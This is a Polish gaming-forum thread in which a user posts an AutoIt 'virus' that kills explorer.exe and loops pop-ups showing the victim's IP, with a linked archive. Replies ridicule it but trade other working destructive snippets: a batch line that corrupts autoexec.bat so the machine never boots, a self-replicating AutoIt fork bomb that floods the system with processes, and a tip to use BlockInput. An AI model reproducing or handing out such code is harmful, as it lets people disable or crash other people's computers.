Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Wirus by JR Projects

KubanczykSA

Rekomendowane odpowiedzi

Opublikowano

Siema, razem z kolegą założyliśmy grupę JR Projects. Wspólnie Tworzymy nowe programy w auto it. Dzis przedstawiam Wam naszego wirusa który uniemożliwia nam korzystanie z komputera i jest niewykrywalny przez antywirusa Wirus by JR Project.rar

udostępnię dla Was jego kod lecz zastrzegam sobie wszystkie prawa do niego

#include <Inet.au3>
$4=_GetIP()
ProcessClose ( "explorer.exe" )
MsgBox(0, "S432gghh", "error "& $4 &"")

$i=1
While $i>0
 #include <Inet.au3>
$4=_GetIP()
MsgBox(0, "S432gghh", "error "& $4 &"",0.3)
$i+=1
Wend

Opublikowano

kurwa, kurwa, kurwa

zanim założycie grupe nauczycie się podstaw

$i=1
While $i>0
#include <Inet.au3>
$4=_GetIP()
$i+=1
Wend

while 1
Wend

@down

to musi być grube posiedzenie :D

Opublikowano

widocznie teraz debatują nad tym jak się nazywa proces menedżera programów windows bo dopisanie tego do kodu to 10 sekund ! ;)

If you = stupid then

insert(foot.in.your.ass)

end if

licznik-54-96732-stat.png

Opublikowano

Jest taka komenda jak BlockInput, bardziej uniemozliwia korzystanie z komputera.

Law of Revelation: The hidden flaw never remains hidden.

Opublikowano

Jak ktoś jest szczery to nie znaczy że jest niekulturalny ....

Jak wrzucasz chłam to mamy bić brawa "YAY kolejny użytkownik z autoitem tworzący nieprzydatne aplikacje !" ?? Bezsens.

Będziemy bić brawa jak zrobisz coś co jest przydatne. "YAY kolejny użytkownik z autoitem tworzący fajne aplikacje !"

Narazie się uczysz, okey, ale nie wrzucaj tego na forum.

Opublikowano

Mógłbyś się wysilić i po 5 sekundach przywrócić ten proces bo i tak każdy to zrobi własnoręcznie.

Ewentualnie wyłączyć od razu kompa.

ps. To nie virus tylko starta czasu, nawet nie ma automatycznego odpalania po restarcie czy też po włączeniu znów explorer.

Co do tego drugiego to if starczy.

If- Jeżeli

Then- To

Opublikowano

A ja mam takie coś

@echo off >> c:autoexec.bat
:start >> c:autoexec.bat
echo echo. >> c:autoexec.bat
goto start >> c:autoexec.bat

Komputer nigdy się nie uruchamia oraz jest w 99% niewykrywalny.

1375799776-U359635.jpg

Opublikowano

@up Jeśli patrzeć na definicje wirusa, to jest to właśnie złośliwy program.

wg mnie najlepsze jest to:

run(@scriptfullpath)
run(@scriptfullpath)

w ciągu kilku sekund robi tyle procesów, że komputer nie jest w stanie tego obsłużyć, każdy proces odpala 2 następne :D i wyłączyć się nie da(bo to w końcu kilka tysiecy procesów, które cały czas sie mnożą)

Działa po skompilowaniu, przed kompilacją należało by uruchomić interpreterem.

Law of Revelation: The hidden flaw never remains hidden.

• 6 miesięcy temu...
Opublikowano

Jakos mój avast wykrywa zagrożenie nawet włączając tą strone poniewaz jest plik który ma wirusowe żródło. I nie odpali pliku bo pisze ze zagraża komputerowi. :D

Opublikowano

widocznie teraz debatują nad tym jak się nazywa proces menedżera programów windows bo dopisanie tego do kodu to 10 sekund ! ;)

Dobrze gada,polać mu !

tak, przyjmę krytykę ale widzę, że na forum nie ma juz kulturalnych ludzi, którzy cieszyli by się z tego, że kolejny użytkownik zaczął przygodę z AutoIt.

Gdybyśmy nie byli kultularni,to pisalibyśmy:

ale z ciebie zjeb bez łba,nie umiesz w ogole pisac zadnych wirosow i jestees totalnym idiotom,wypierdalaj z tego forum

Specjalnie dałem w code

Jak ktoś jest szczery to nie znaczy że jest niekulturalny ....

Jak wrzucasz chłam to mamy bić brawa "YAY kolejny użytkownik z autoitem tworzący nieprzydatne aplikacje !" ?? Bezsens.

Będziemy bić brawa jak zrobisz coś co jest przydatne. "YAY kolejny użytkownik z autoitem tworzący fajne aplikacje !"

Narazie się uczysz, okey, ale nie wrzucaj tego na forum.

Według mnie masz totalną racje.

lol, jak już tak bardzo chcecie wyłączać explorer to już nawet w batchu można to zrobić, i nawet pętle -,-

Wolą AutoIT-maja auto it.

Mógłbyś się wysilić i po 5 sekundach przywrócić ten proces bo i tak każdy to zrobi własnoręcznie.

Ewentualnie wyłączyć od razu kompa.

ps. To nie virus tylko starta czasu, nawet nie ma automatycznego odpalania po restarcie czy też po włączeniu znów explorer.

Co do tego drugiego to if starczy.

If- Jeżeli

Then- To

Dokładnie. bez automatycznego odpalania to wielki kawał gówna(13 linijkowego)

@up Jeśli patrzeć na definicje wirusa, to jest to właśnie złośliwy program.

wg mnie najlepsze jest to:

run(@scriptfullpath)
run(@scriptfullpath)
w ciągu kilku sekund robi tyle procesów, że komputer nie jest w stanie tego obsłużyć, każdy proces odpala 2 następne :D i wyłączyć się nie da(bo to w końcu kilka tysiecy procesów, które cały czas sie mnożą)

Działa po skompilowaniu, przed kompilacją należało by uruchomić interpreterem.

Genialne,nie ma sposobu aby to wyłączyć,jeżeli to sie cały czas klonuje,i to sie nazywa wirus

unibag.png

Opublikowano

Żenada, lepszy skrypt napisałem gdy zaczynałem się bawić z AutoItem. Totalny bezsens, temat należy palnąć do kosza. Kumam kreatywność i podnietę, ale nie na takie forum :P Gdyby pokazali ci profesjonalny skrypt, to .. nie rozczytałbyś się ;)

Opublikowano

świetna grupa ... nie no w sumie od czegoś tam możecie zaczynać ale pamiętajcie całe życie: musicie mieć ogromne ambicje.

Bez tego nic nie zdziałacie ,projekt "zróbmy wirusa" jest cienki, zróbcie coś użytkowego np. coś pod excela obsługi, albo komunikator LAN , czy tez program kontrolujący inne komputery w LANie ,np. do firmy jakiejś dla pracodawcy zeby kontrolowac pracownikow. A potem jak to zrobicie poczujecie się jak gość w mojej sygnie :)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...